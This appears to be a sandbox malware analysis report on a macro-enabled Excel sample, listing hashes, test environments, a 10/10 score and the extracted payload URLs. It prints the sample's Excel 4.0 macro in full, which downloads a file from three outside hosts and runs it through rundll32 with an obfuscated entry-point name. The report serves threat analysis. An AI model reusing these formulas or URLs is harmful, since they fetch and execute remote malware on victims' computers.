General
-
Target
?i=1ddhggdgp
-
Size
83KB
-
Sample
220522-f6b2msbbhn
-
MD5
88add4c02ddd08f3920ea988f584120a
-
SHA1
413cee3adb3c80e16e87a9d168846c480291772f
-
SHA256
5431cd4c5693f99cd843792b98dcb1a50f26e42db66186aebd56c2ae8b0053b6
-
SHA512
c22114f39f7ed0d63de1f214d4e35c92612b07839051cefe801a486e5912e884843054bec9e46198f4f9d34c67ac67e508bf73a0a9cfcd63ec575dabc956cb0c
Behavioral task
behavioral1
Sample
?i=1ddhggdgp.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
?i=1ddhggdgp.xlsm
Resource
win10v2004-20220414-en
Malware Config
Extracted
http://www.crownpacificpartners.com/guglio/Rt4el/
http://nbp-c.com/ya/O0BO5vb3z1MkWcDOqV2/
http://rjmtel.com/wp-content/bYAiTvGo635qKITG6/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.crownpacificpartners.com/guglio/Rt4el/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://nbp-c.com/ya/O0BO5vb3z1MkWcDOqV2/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://rjmtel.com/wp-content/bYAiTvGo635qKITG6/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()
Extracted
http://www.crownpacificpartners.com/guglio/Rt4el/
http://nbp-c.com/ya/O0BO5vb3z1MkWcDOqV2/
http://rjmtel.com/wp-content/bYAiTvGo635qKITG6/
Targets
-
-
Target
?i=1ddhggdgp
-
Size
83KB
-
MD5
88add4c02ddd08f3920ea988f584120a
-
SHA1
413cee3adb3c80e16e87a9d168846c480291772f
-
SHA256
5431cd4c5693f99cd843792b98dcb1a50f26e42db66186aebd56c2ae8b0053b6
-
SHA512
c22114f39f7ed0d63de1f214d4e35c92612b07839051cefe801a486e5912e884843054bec9e46198f4f9d34c67ac67e508bf73a0a9cfcd63ec575dabc956cb0c
Score10/10 -